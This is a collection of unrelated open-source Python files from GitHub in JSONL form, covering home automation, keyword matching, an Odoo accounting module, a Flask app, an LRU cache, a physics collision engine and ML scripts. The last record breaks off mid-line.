def dim(self, level):\n self._assert_capability(\"dim\")\n self._domoticz.invalidate_device(self.id)\n self._request({\n \"type\": \"command\",\n \"param\": \"switchlight\",\n \"idx\": self.id,\n \"switchcmd\": \"Set Level\",\n \"level\": round(level * 16)\n })\n\n #Climate functionality\n @property\n def temperature(self):\n self._assert_capability(\"thermometer\")\n return self._get_state(\"Temp\")\n\n @property\n def humidity(self):\n self._assert_capability(\"hygrometer\")\n return self._get_state(\"Humidity\") / 100.0\n","repo_name":"robhol/DomoticzControl","sub_path":"domoticz_control/device.py","file_name":"device.py","file_ext":"py","file_size_in_byte":3332,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"745648940","text":"# _*_ coding: utf-8 _*_\n\"\"\"\nTime: 2021/12/31 13:10\nAuthor: ChenXin\nVersion: V 0.1\nFile: flashText.py\nDescribe: Github link: https://github.com/Chen-X666\n\"\"\"\nfrom flashtext import KeywordProcessor\n\ndef build_actree(wordlist):\n '''\n AC自动机进行关键词匹配\n 构造AC trie\n '''\n actree = KeywordProcessor()\n for index, word in enumerate(wordlist):\n actree.add_keyword(word) # 向trie树中添加单词\n #self.actree = actree\n return actree\n\ndef ac_detect(actree,text,span_info = True):\n '''\n AC自动机进行关键词匹配\n 文本匹配\n '''\n region_wds = []\n for w1 in actree.extract_keywords(text,span_info = span_info):\n if len(w1) > 0:\n region_wds.append(w1[0])\n return region_wds\n\nif __name__ == '__main__':\n wordlist = ['健康','减肥']\n text = '今天你减肥了吗,今天你健康了吗,减肥 = 健康!'\n actree = build_actree(wordlist)\n print(ac_detect(actree,text))","repo_name":"Chen-X666/bulletNewWordsDiscovery","sub_path":"NewWordDiscovery/tool/flashText.py","file_name":"flashText.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"91"}
+{"seq_id":"5748739501","text":"\"\"\" [DESAFIO] Crie um programa que leia o tamanho de três segmentos de reta.\r\nAnalise seus comprimentos e diga se é possível formar um triângulo com essas\r\nretas. Matematicamente, para três segmentos formarem um triângulo, o comprimento\r\nde cada lado deve ser menor que a soma dos outros dois.\r\n\"\"\"\r\nline1 = float(input('Set a line segment: '))\r\nline2 = float(input('Set other line segment: '))\r\nline3 = float(input('Set another line segment: '))\r\n\r\nif line1 + line2 > line3 and line2+line3 > line1 and line1+line3> line2:\r\n print('You can form a triangle with these segments.')\r\n\r\n\r\n\r\n","repo_name":"felipeonf/Exercises_Python","sub_path":"exercícios_fixação/024.py","file_name":"024.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"12989001019","text":"# -*- coding: utf-8 -*-\nfrom openerp.osv import fields, orm\nfrom openerp import netsvc\n\n\nclass account_cash_statement(orm.Model):\n _inherit = \"account.bank.statement\"\n\n def journal_id_change(self, cr, uid, context=None, *args):\n context = context or {}\n is_cjc = self.pool.get(\"account.journal\").browse(cr, uid, args[0], context=context).is_cjc\n return {\"value\": {\"is_cjc\": is_cjc}}\n\n _columns = {\n \"is_cjc\": fields.boolean(\"Control de caja chica\", readonly=False)\n }\n\n def create_invoice_wizard(self, cr, uid, ids, context=None):\n view_id = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'marcos_cjc', 'cjc_wizard_view_form')[1]\n wizard = {\n 'name': 'Gasto de caja chica',\n 'view_mode': 'form',\n 'view_id': False,\n 'views': [(view_id, 'form')],\n 'view_type': 'form',\n 'res_model': 'cjc.invoice.wizard',\n 'type': 'ir.actions.act_window',\n 'target': 'new',\n 'context': context\n }\n return wizard\n\n def button_confirm_cash(self, cr, uid, ids, context=None):\n result = super(account_cash_statement, self).button_confirm_bank(cr, uid, ids, context=context)\n try:\n wf_service = netsvc.LocalService(\"workflow\")\n invoiced = []\n uninvoiced = []\n for statement in self.browse(cr, uid, ids):\n for line in statement.line_ids:\n if line.invoice_id:\n invoiced.append(line.invoice_id.id)\n elif line.amount < 0:\n uninvoiced.append(line)\n\n # for inv_id in invoiced:\n # wf_service.trg_validate(uid, 'account.invoice', inv_id, 'invoice_open', cr)\n\n statement = self.browse(cr, uid, ids)[0]\n journal = statement.journal_id\n minor_journal = journal.gastos_journal_id\n minor_partner = minor_journal.special_partner\n minor_product = minor_journal.special_product\n vals = {}\n vals.update({\n u'account_id': journal.default_credit_account_id.id,\n u'check_total': 0,\n u'child_ids': [[6, False, []]],\n u'comment': \"Gasto menor generado por caja chica\",\n u'company_id': 1,\n u'currency_id': journal.company_id.currency_id.id,\n u'date_due': False,\n u'date_invoice': statement.date,\n u'fiscal_position': minor_partner.property_account_position.id,\n u'internal_number': False,\n u'journal_id': minor_journal.id,\n u'message_follower_ids': False,\n u'message_ids': False,\n u'name': False,\n u'ncf_required': False,\n u'origin': statement.name,\n u'parent_id': False,\n u'partner_bank_id': False,\n u'partner_id': minor_partner.id,\n u'payment_term': False,\n u'period_id': statement.period_id.id,\n u'reference': False,\n u'reference_type': \"02\",\n u'supplier_invoice_number': False,\n u'tax_line': [],\n u'user_id': uid,\n u'pay_to': statement.journal_id.pay_to.id,\n u'invoice_line': []\n })\n if uninvoiced:\n line_ids = []\n for line in uninvoiced:\n line_ids.append(line.id)\n line_list = [0, False]\n line_dict = {}\n line_dict.update({\n u'account_analytic_id': False,\n u'account_id': minor_product.property_account_expense.id,\n u'asset_category_id': False,\n u'discount': 0,\n u'invoice_line_tax_id': [[6, False, [t.id for t in minor_product.supplier_taxes_id]]],\n u'name': line.name,\n u'price_unit': abs(line.amount),\n u'product_id': minor_product.id,\n u'quantity': 1,\n u'uos_id': 1\n })\n line_list.append(line_dict)\n vals[\"invoice_line\"].append(line_list)\n\n context.update({u'default_type': u'in_invoice', u'journal_type': u'purchase'})\n inv_id = self.pool.get(\"account.invoice\").create(cr, uid, vals, context=context)\n self.pool.get(\"account.bank.statement.line\").write(cr, uid, line_ids, {\"invoice_id\": inv_id})\n wf_service.trg_validate(uid, 'account.invoice', inv_id, 'invoice_open', cr)\n except:\n pass\n\n return result\n\n\n\n\n\nclass account_bank_statement_line(orm.Model):\n _inherit = \"account.bank.statement.line\"\n\n _columns = {\n \"invoice_id\": fields.many2one(\"account.invoice\", \"Factura\")\n }\n\n def unlink(self, cr, uid, ids, context=None):\n context = context or {}\n for line in self.browse(cr, uid, ids):\n if context.get(\"journal_type\", False) == \"cash\" and line.invoice_id:\n self.pool.get(\"account.invoice\").unlink(cr, uid, [line.invoice_id.id], context=context)\n\n return super(account_bank_statement_line, self).unlink(cr, uid, ids, context=context)\n","repo_name":"eneldoserrata/marcos_openerp","sub_path":"marcos_addons/marcos_cjc/account_bank_statement.py","file_name":"account_bank_statement.py","file_ext":"py","file_size_in_byte":5702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"70423451184","text":"import GameEnvironment.EnvironmentConfigurer\nimport GameEnvironment.EnvironmentCore\nimport GameEnvironment.EnvironmentRenderer\nimport os\nfrom datetime import datetime\n\nimport tensorflow as tf\nimport numpy as np\n\n\nclass EnvironmentLauncher:\n def __init__(self):\n self.log_path = \"./logs/\"\n if not os.path.exists(self.log_path):\n os.mkdir(self.log_path)\n self.log_file = open(self.log_path + str(datetime.now()).replace(\" \", \"_\").replace(\":\", \"-\") + \".log\", \"w+\")\n\n self.env_renderer = GameEnvironment.EnvironmentRenderer.EnvironmentRenderer(self.log_file)\n self.env_core = GameEnvironment.EnvironmentCore.EnvironmentCore(self.env_renderer, self.log_file)\n self.env_configurer = GameEnvironment.EnvironmentConfigurer.EnvironmentConfigurer(self.env_core,\n self.env_renderer,\n self.log_file)\n\n # Order is important, some things should be initialized earlier although dependencies usually appear earlier.\n # Therefore init() function should to initialize/define object but not his depended objects\n self.env_configurer.init()\n self.env_renderer.init()\n self.env_core.reset(False)\n\n def start(self):\n self.env_configurer.start_threads()\n self.log_file.flush()\n self.log_file.close()\n\n\nif __name__ == '__main__':\n tf.compat.v1.disable_eager_execution()\n np.set_printoptions(precision=3)\n np.set_printoptions(suppress=True)\n\n launcher = EnvironmentLauncher()\n launcher.start()\n","repo_name":"Deesthortered/DiplomaThesis","sub_path":"GameEnvironment/EnvironmentLauncher.py","file_name":"EnvironmentLauncher.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"8052264510","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport unittest\nimport sys\nimport os\n\nroot_path = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..'))\nsys.path.append(root_path)\n\nimport itmm_schedule_checker\n\nclass Test_itmm_schedule_checker(unittest.TestCase):\n def test_WnenDifferentColorsInDateString(self):\n self.parser = itmm_schedule_checker.SchedulePageParser()\n html = ('
Постоянное расписание магистров '\n ''\n 'здесь'\n '(новое!'\n ' версия от 19'\n '.'\n '10.2016 г. 17:20)
')\n\n\n result = self.parser._prepareHTML(html)\n\n self.assertEqual(result,\n ('
Постоянное расписание магистров '\n ''\n 'здесь (новое! версия от 19.10.2016 г. '\n '17:20)
'))\n\n def test_WhenGetContent(self):\n self.parser = itmm_schedule_checker.SchedulePageParser(\n itmm_schedule_checker.content_div_style)\n with open('schedule_webpage.html', encoding='utf-8') as file:\n html = file.read()\n with open('plain_content.txt', encoding='utf-8') as file:\n content = file.read()\n\n self.parser.feed(html)\n\n self.assertEqual(self.parser.content, content)\n\n def test_keywords_highlight(self):\n keywords = (\"381606\",)\n original_html = ('
Не состоятся занятия у групп: '\n '1) группа 1381407-3(а0837-2): 17 ноября занятия по РЯиДР и ИТвИД, '\n '2) 381603м4: 16 ноября занятия по ПиЭВвИТ, '\n '3) 381606м2!: 17 ноября занятия по ИТвПНП
')\n\n html = itmm_schedule_checker.keywords_highlight(original_html, keywords)\n\n self.assertEqual(html,('
Не состоятся занятия у групп: '\n '1) группа 1381407-3(а0837-2): 17 ноября занятия по РЯиДР и ИТвИД, '\n '2) 381603м4: 16 ноября занятия по ПиЭВвИТ, '\n '3) '\n '381606м2!: 17 ноября занятия по ИТвПНП
'))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"rybval/itmm_schedule_checker","sub_path":"tests/unittests.py","file_name":"unittests.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"30605916006","text":"from flask import Flask, request, render_template\nimport base64\nimport os\nfrom db import db_inserts\nfrom search import Search\n\napp = Flask(__name__)\nSearch.start_up()\n\n@app.route(\"/\", methods=(\"GET\", \"POST\"))\ndef index():\n return render_template(\"index.html\")\n\n\n@app.route(\"/watchlist/\", methods=(\"GET\", \"POST\"))\ndef watchlist():\n if request.method == \"POST\":\n email = request.form[\"email\"]\n champs = request.form[\"content\"]\n x = db_inserts(email, champs)\n return render_template(\"confirmation.html\")\n if request.method == \"GET\":\n return render_template(\"watchlist.html\")\n\n\n@app.get(\"/confirmed/\")\ndef confirm():\n return render_template(\"confirmation.html\")\n\n\n@app.get(\"/summoner//\")\ndef get_summoner_data(region, nick):\n if request.method == \"GET\":\n return render_template(\"summoner.html\",summoner=Search(region,nick))\n\n\n@app.get(\"/404/\")\ndef test404():\n return render_template(\"404.html\")\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=os.getenv(\"PORT\", default=5000))\n","repo_name":"league-project/league-deployment-project","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"4339663706","text":"class Node:\n def __init__(self, key=None, value=None):\n self.key = key\n self.value = value\n self.pre = None\n self.next = None\n\n\nclass LRUCache:\n\n def __init__(self, capacity: int):\n self.capacity = capacity\n self.head = Node()\n self.tail = Node()\n self.head.next = self.tail\n self.tail.pre = self.head\n\n self.dic = dict()\n \n def get(self, key: int) -> int:\n if key in self.dic:\n self.move_to_end(key)\n return self.dic[key].value\n else:\n return -1\n \n\n def put(self, key: int, value: int) -> None:\n if key in self.dic:\n self.move_to_end(key)\n self.dic[key].value = value\n else:\n new_node = Node(key, value)\n self.dic[key] = new_node\n new_node.pre = self.tail.pre\n new_node.next = self.tail\n self.tail.pre.next = new_node\n self.tail.pre = new_node\n if len(self.dic) > self.capacity:\n self.dic.pop(self.head.next.key)\n self.head.next = self.head.next.next\n self.head.next.pre = self.head\n \n\n def move_to_end(self, key: int):\n #\n old_node = self.dic[key]\n old_node.pre.next = old_node.next\n old_node.next.pre = old_node.pre\n\n old_node.next = self.tail\n old_node.pre = self.tail.pre\n self.tail.pre.next = old_node\n self.tail.pre = old_node\n\n# from collections import OrderedDict\n# class LRUCache(OrderedDict):\n\n# def __init__(self, capacity: int):\n# self.capacity = capacity\n\n\n# def get(self, key: int) -> int:\n# if key not in self:\n# return -1\n# else:\n# self.move_to_end(key)\n# return self[key]\n\n\n# def put(self, key: int, value: int) -> None:\n# if key in self:\n# self.move_to_end(key)\n# self[key] = value\n# if len(self) > self.capacity:\n# self.popitem(last = False)","repo_name":"ShallowAlex/leetcode-py","sub_path":"101-200/146.py","file_name":"146.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"7564212430","text":"str = 'dir\\n\\tsubdir1\\n\\t\\tfile1.ext\\n\\t\\tsubsubdir1\\n\\tsubdir2\\n\\t\\tsubsubdir2\\n\\t\\t\\tfile2.ext'\n\n\ndef build_fs(input):\n fs = {}\n files = input.split('\\n')\n # print(files)\n\n current_path = []\n for f in files:\n indentation = 0\n while '\\t' in f[:2]:\n indentation += 1\n f = f[1:]\n\n # print(current_path)\n current_node = fs\n for subdir in current_path[:indentation]:\n current_node = current_node[subdir]\n if '.' in f:\n current_node[f] = True\n else:\n current_node[f] = {}\n current_path = current_path[:indentation]\n current_path.append(f)\n\n return fs\n\n\ndef longest_path(root):\n paths = []\n for key, node in root.items():\n if node == True:\n paths.append(key)\n else:\n paths.append(key + '/' + longest_path(node))\n paths = [path for path in paths if '.' in path]\n if paths:\n return max(paths, key=lambda path: len(path))\n else:\n return ''\n\n\ndef longest_absolute_path(s):\n return len(longest_path(build_fs(s)))\n\n\nprint(longest_absolute_path(str))\n","repo_name":"sj43/Code-Storage","sub_path":"DailyCodingProblem/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"509491059","text":"import numpy as np\nfrom PIL import Image\nimport network\nimport os\nimport math\nimport render_utils\nimport paddle\nimport paddle.nn as nn\nimport paddle.nn.functional as F\nimport cv2\nimport render_parallel\nimport render_serial\n\n\ndef main(input_path, model_path, output_dir, need_animation=False, resize_h=None, resize_w=None, serial=False):\n if not os.path.exists(output_dir):\n os.mkdir(output_dir)\n input_name = os.path.basename(input_path)\n output_path = os.path.join(output_dir, input_name)\n frame_dir = None\n if need_animation:\n if not serial:\n print('It must be under serial mode if animation results are required, so serial flag is set to True!')\n serial = True\n frame_dir = os.path.join(output_dir, input_name[:input_name.find('.')])\n if not os.path.exists(frame_dir):\n os.mkdir(frame_dir)\n stroke_num = 8\n\n #* ----- load model ----- *#\n paddle.set_device('gpu')\n net_g = network.Painter(5, stroke_num, 256, 8, 3, 3)\n net_g.set_state_dict(paddle.load(model_path))\n net_g.eval()\n for param in net_g.parameters():\n param.stop_gradient = True\n\n #* ----- load brush ----- *#\n brush_large_vertical = render_utils.read_img('brush/brush_large_vertical.png', 'L')\n brush_large_horizontal = render_utils.read_img('brush/brush_large_horizontal.png', 'L')\n meta_brushes = paddle.concat([brush_large_vertical, brush_large_horizontal], axis=0)\n\n import time\n t0 = time.time()\n\n original_img = render_utils.read_img(input_path, 'RGB', resize_h, resize_w)\n if serial:\n final_result_list = render_serial.render_serial(original_img, net_g, meta_brushes)\n if need_animation:\n\n print(\"total frame:\", len(final_result_list))\n for idx, frame in enumerate(final_result_list):\n cv2.imwrite(os.path.join(frame_dir, '%03d.png' % idx), frame)\n else:\n cv2.imwrite(output_path, final_result_list[-1])\n else:\n final_result = render_parallel.render_parallel(original_img, net_g, meta_brushes)\n cv2.imwrite(output_path, final_result)\n\n print(\"total infer time:\", time.time() - t0)\n\n\nif __name__ == '__main__':\n\n main(\n input_path='input/chicago.jpg',\n model_path='paint_best.pdparams',\n output_dir='output/',\n need_animation=True, # whether need intermediate results for animation.\n resize_h=512, # resize original input to this size. None means do not resize.\n resize_w=512, # resize original input to this size. None means do not resize.\n serial=True) # if need animation, serial must be True.\n","repo_name":"PaddlePaddle/PaddleHub","sub_path":"modules/image/Image_gan/style_transfer/paint_transformer/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2641,"program_lang":"python","lang":"en","doc_type":"code","stars":12260,"dataset":"github-code","pt":"91"}
+{"seq_id":"2655505897","text":"import cs50\n\ndef main():\n n = 0\n while True:\n print(\"Height: \", end = \"\")\n n = cs50.get_int()\n if(n >= 0 and n <= 23):\n break\n \n for i in range(n, 0 , -1):\n for a in range (i - 1):\n print(\" \", end = \"\")\n \n for b in range(i, n + 1):\n print(\"#\", end = \"\")\n print(\"#\")\n \nif __name__ == \"__main__\":\n main()\n ","repo_name":"PaskoZhelev/CS50x-Harvard","sub_path":"pset6/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"15822827245","text":"\"\"\"\nReceive a classical message from the sender.\n\"\"\"\n\nfrom netqasm.logging.output import get_new_app_logger\nfrom netqasm.sdk.external import NetQASMConnection, Socket\nfrom netqasm.sdk import EPRSocket\n\n\ndef main(app_config=None):\n \"\"\"\n Application main function for the receiver.\n \"\"\"\n\n app_logger = get_new_app_logger(app_name=app_config.app_name, log_config=app_config.log_config)\n app_logger.log(\"receiver starts\")\n\n app_logger.log(\"receiver creates classical socket\")\n socket = Socket(\"receiver\", \"sender\", log_config=app_config.log_config)\n\n app_logger.log(\"receiver creates quantum socket\")\n epr_socket = EPRSocket(\"sender\")\n\n app_logger.log(\"receiver creates qasm connection\")\n _receiver = NetQASMConnection(\n \"receiver\", log_config=app_config.log_config, epr_sockets=[epr_socket]\n )\n\n message = socket.recv()\n app_logger.log(f\"receiver receives messate {message} from sender\")\n\n return \"receiver finishes\"\n","repo_name":"brunorijsman/quantum-internet-hackathon-2022","sub_path":"qne_adk/classical_socket/src/app_receiver.py","file_name":"app_receiver.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"91"}
+{"seq_id":"15598077663","text":"from statistics import mean, stdev\nimport logging\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass IgnoreLargeBody:\n\n def __init__(self, initial_limit=1024*1024):\n self.initial_limit = initial_limit\n self.data = BodySize(self.initial_limit)\n\n def set_kb(self, kb):\n kb.body_size = self.data\n\n def load_kb(self, kb):\n self.data = kb.body_size\n\n async def after_headers(self, entry):\n entry.result.read_length = self._get_read_limit(entry.response)\n\n async def after_response(self, entry):\n if entry.result.read_length == -1:\n # Collect statistics post-response when the content-length was unknown.\n full_length = len(entry.response.raw)\n limit = self.data.applicable_limit\n self.data.add(full_length)\n\n if full_length > limit:\n # Apply the limit post-response if above the desired limit\n # Keep read_length coherent with the content for other heuristics to\n # work from.\n entry.response.raw = entry.response.raw[0:limit]\n entry.response.truncated = True\n entry.result.read_length = limit\n\n def _get_read_limit(self, response):\n length = response.headers.get('Content-Length')\n if length is not None:\n try:\n length = int(length)\n self.data.add(length)\n return self.data.applicable_limit\n except ValueError:\n logger.debug(\"Bad Content-Length: %s\", length)\n\n return self.data.calculated_limit or -1\n\n\nclass BodySize:\n\n def __init__(self, initial_limit):\n self.initial_limit = initial_limit\n self.collected_sizes = []\n self.calculated_limit = None\n\n @property\n def applicable_limit(self):\n return self.calculated_limit or self.initial_limit\n\n def add(self, length):\n if self.calculated_limit is None:\n self.collected_sizes.append(length)\n\n if len(self.collected_sizes) > 500:\n self.calculated_limit = int(mean(self.collected_sizes) + 5 * stdev(self.collected_sizes))\n logger.info(\"Updating max body size to %s\", self.calculated_limit)\n","repo_name":"delvelabs/hammertime","sub_path":"hammertime/rules/body.py","file_name":"body.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"91"}
+{"seq_id":"25324351172","text":"from block_mechanism import BlockMechanism\nfrom block import Block\nimport numpy as np\nnp.seterr(divide='ignore', invalid='ignore')\nimport math\n\nclass CollisionDirector():\n def detect_and_effect_collision(self,block_mechanism_1:BlockMechanism, block_mechanism_2:BlockMechanism, time_between_frame:float):\n '''\n if there is collision, return (block1, block2)\n block1 from mecha1, block2 from mecha2\n else return None\n '''\n for _, block1 in block_mechanism_1.get_blocks().items():\n for _, block2 in block_mechanism_2.get_blocks().items():\n if not (block1._visible and block2._visible):\n continue\n if not (self.block_collide_data(block1, block2) == None):\n # print(\"Col Director:\", self.block_collide_data(block1, block2))\n effect_loc, normal_vector_block2= self.block_collide_data(block1, block2)\n\n impluse = self._cal_collision_impluse(block_mechanism_1.get_momentum(), block_mechanism_2.get_momentum(), block_mechanism_1.get_angular_momentum(), block_mechanism_2.get_angular_momentum(),block_mechanism_1.get_mass(), block_mechanism_2.get_mass(), normal_vector_block2, 1).transpose()\n # print(\"Col Director: impluse:\", impluse)\n\n force_1 = (-impluse[0]/time_between_frame, -impluse[1]/time_between_frame)\n force_2 = (impluse[0]/time_between_frame, impluse[1]/time_between_frame)\n block_mechanism_1.add_force(force_1, effect_loc, time_between_frame)\n block_mechanism_2.add_force(force_2, effect_loc, time_between_frame)\n \n # Damage block\n val1=math.sqrt(block_mechanism_1._momentum[0]**2 + block_mechanism_1._momentum[1]**2)\n val2=math.sqrt(block_mechanism_2._momentum[0]**2 + block_mechanism_2._momentum[1]**2)\n val = (val1+val2)/5000\n block1.damage_block(val)\n block2.damage_block(val)\n #print(\"damage: \",val)\n\n # Remove destroyed blocks\n if block1.get_status()==0:\n block_mechanism_1.remove_block(block1)\n\n if block2.get_status()==0:\n block_mechanism_2.remove_block(block2)\n\n return (block1, block2)\n return None\n \n def block_collide_data(self, block1:Block, block2:Block) -> tuple:\n '''\n return node:tuple, normal_vector, the direction of force of block2:np.ndarray\n if doesnt collide, returns None\n '''\n # block2's node in block1\n IMPACT_LINE_STRETCH = 100\n for node_index in range(len(block2.get_nodes())):\n if self.is_node_in_block(block2.get_nodes()[node_index], block1):\n node = tuple(block2.get_nodes()[node_index])\n impact_line = [block2.get_previous_nodes()[node_index], tuple(block2.get_nodes()[node_index])]\n impact_line[0] = ((impact_line[0][0]-impact_line[1][0])*IMPACT_LINE_STRETCH+impact_line[1][0], (impact_line[0][1]-impact_line[1][1])*IMPACT_LINE_STRETCH+impact_line[1][1])\n impact_line[1] = ((impact_line[1][0]-impact_line[0][0])*IMPACT_LINE_STRETCH+impact_line[0][0], (impact_line[1][1]-impact_line[0][1])*IMPACT_LINE_STRETCH+impact_line[0][1])\n for line in block1.get_lines():\n if self._detect_crossover(line, impact_line):\n # #print(node, self._normal_vector_for_impactor(impact_line, line))\n return node, self._normal_vector_for_impactor(impact_line, line)\n return None\n return None\n\n def is_node_in_block(self, node:tuple, block:Block) -> bool:\n '''\n if there is a node which is in the block, return the node\n '''\n nodes = block.get_nodes()\n if not ((nodes[0][0]-nodes[1][0]) == 0 or (nodes[2][0]-nodes[1][0]) == 0):\n ma = (nodes[0][1]-nodes[1][1])/(nodes[0][0]-nodes[1][0])\n b1 = nodes[1][1]-ma*nodes[1][0]\n b2 = nodes[2][1]-ma*nodes[2][0]\n bt = node[1]-ma*node[0]\n if not ((b2 >= bt and bt >= b1) or (b1 >= bt and bt >= b2)):\n return False\n \n mb = ((nodes[2][1]-nodes[1][1])/(nodes[2][0]-nodes[1][0]))\n b1 = nodes[1][1]-mb*nodes[1][0]\n b0 = nodes[0][1]-mb*nodes[0][0]\n btt = node[1]-mb*node[0]\n if not ((b1 >= btt and btt >= b0) or (b0 >= btt and btt >= b1)):\n return False\n \n return True\n else:\n # x coor\n if not ((nodes[1][0] >= node[0] and node[0] >= nodes[3][0]) or (nodes[3][0] >= node[0] and node[0] >= nodes[1][0])):\n return False\n \n # y coor\n if not ((nodes[1][1] >= node[1] and node[1] >= nodes[3][1]) or (nodes[3][1] >= node[1] and node[1] >= nodes[1][1])):\n return False\n \n return True\n \n def _normal_vector_for_impactor(self, impact_line, hit_line) -> np.ndarray:\n '''\n hit line been hit by node\n '''\n v1 = np.array([impact_line[1][0]-impact_line[0][0], impact_line[1][1]-impact_line[1][0]]).transpose()\n v2 = np.array([hit_line[1][0]-hit_line[0][0], hit_line[1][1]-hit_line[1][0]]).transpose()\n vn = v1 - (np.dot(v1, v2)/np.dot(v2, v2))*v2\n vn_length = np.linalg.norm(vn)\n\n if vn_length == 0:\n return 0\n else:\n vn = -1*(vn/vn_length)\n return vn\n \n def _array_to_tuple(self, arr):\n if isinstance(arr, np.ndarray):\n return tuple(self._array_to_tuple(e) for e in arr)\n else:\n return arr\n \n def _detect_crossover(self, line1:tuple, line2:tuple) -> bool:\n '''\n line is made of two points ((x1, y1), (x2, y2))\n '''\n # ax + by = c\n # y - y0 = m(x - x0)\n # (y-y0) = mx - mx0\n # y-y0-mx = -mx0\n # y - mx = y0 - mx0\n # #print(f\"line1:{line1}\")\n # #print(f\"line2:{line2}\")\n line2_points_for_line1 = False\n try:\n m1 = (line1[1][1]-line1[0][1])/(line1[1][0]-line1[0][0])\n line1_equation = lambda x, y: y - (line1[1][1]-line1[0][1])/(line1[1][0]-line1[0][0])*x\n answer_if_on_line1 = line1[0][1]-m1*line1[0][0]\n \n if not ((line1_equation(line2[0][0], line2[0][1]) > answer_if_on_line1 and line1_equation(line2[1][0], line2[1][1]) > answer_if_on_line1) or\\\n (line1_equation(line2[0][0], line2[0][1]) < answer_if_on_line1 and line1_equation(line2[1][0], line2[1][1]) < answer_if_on_line1)):\n # #print(\"CROSSOVER\")\n line2_points_for_line1 = True\n except: # ZeroDivisionError:\n x = line1[0][0]\n if not ((line2[0][0] > x and line2[1][0] > x) or (line2[0][0] < x and line2[1][0] < x)):\n # #print(\"CROSSOVER\")\n line2_points_for_line1 = True\n \n line1_points_for_line2 = False\n try:\n m2 = (line2[1][1]-line2[0][1])/(line2[1][0]-line2[0][0])\n line2_equation = lambda x, y: y - (line2[1][1]-line2[0][1])/(line2[1][0]-line2[0][0])*x\n answer_if_on_line2 = line2[0][1]-m2*line2[0][0]\n \n if not ((line2_equation(line1[0][0], line1[0][1]) > answer_if_on_line2 and line2_equation(line1[1][0], line1[1][1]) > answer_if_on_line2) or\\\n (line2_equation(line1[0][0], line1[0][1]) < answer_if_on_line2 and line2_equation(line1[1][0], line1[1][1]) < answer_if_on_line2)):\n # #print(\"CROSSOVER\")\n line1_points_for_line2 = True\n except: # ZeroDivisionError:\n x = line2[0][0]\n if not ((line1[0][0] > x and line1[1][0] > x) or (line1[0][0] < x and line1[1][0] < x)):\n # #print(\"CROSSOVER\")\n line1_points_for_line2 = True\n \n return line2_points_for_line1 and line1_points_for_line2\n \n def _cal_collision_impluse(self, momentum1:tuple, momentum2:tuple, angular_momentum1:float, angular_momentum2:float, mass1:float, mass2:float, normal_vector:np.ndarray, e:float) -> np.ndarray:\n '''\n e must be 0 to 1\n normal_vector is the back direction of the opponent's direction\n '''\n SCALAR_MIN = 1000\n momentum1 = np.array(momentum1).transpose()\n momentum2 = np.array(momentum2).transpose()\n \n scalar = ((1+e)*np.dot(((momentum1*(1/mass1))-(momentum2*(1/mass2))), normal_vector))/((1/mass1)+(1/mass2))\n scalar += abs((1+e)*(((angular_momentum1*(1/mass1))-(angular_momentum2*(1/mass2)))))/((1/mass1)+(1/mass2))\n #print(\"Col dir: Scalar:\", scalar)\n if np.linalg.norm(scalar) < SCALAR_MIN:\n if np.linalg.norm(scalar) == 0:\n scalar = scalar*SCALAR_MIN\n else:\n scalar = scalar*(SCALAR_MIN/np.linalg.norm(scalar))\n\n impluse = scalar*normal_vector\n return impluse\n ","repo_name":"dctime/atom-collision","sub_path":"collision_director.py","file_name":"collision_director.py","file_ext":"py","file_size_in_byte":9221,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"91"}
+{"seq_id":"17019976774","text":"#!/usr/bin/env python3\n\"\"\" use keras to predict btc price based on previous 24h data \"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport tensorflow as tf\n\n\n# first we need to use functions to get data into a tf dataset\ndef split_window(features):\n \"\"\" healper function for mapping data as inputs and labels\n features: the timeseries dataset as array\n Returns: inputs, labels\n inputs: list of the time series for training\n labels: list of the corresponding labels\n \"\"\"\n input_w = 24 * 60\n label_w = 1\n label_start = 24 * 60 + 59\n input_slice = slice(0, input_w)\n label_slice = slice(label_start, None)\n\n inputs = features[:, input_slice, :]\n labels = features[:, label_slice, :]\n labels = labels[:, :, -1:]\n\n inputs.set_shape([None, input_w, None])\n labels.set_shape([None, label_w, None])\n return inputs, labels\n\n\ndef keras_data(dataframe):\n \"\"\" change pandas dataframe into keras detaset\n dataframe: a pandas dataframe, preprocesses, but not normalized\n Returns: the tf.dataset.Dataset\n \"\"\"\n # if timestamp column remains remove\n # datafram = dataframe.drop(labels=['Timestamp'], axis='columns')\n\n # normalize dataframe data in place\n dataframe = (dataframe - dataframe.mean()) / 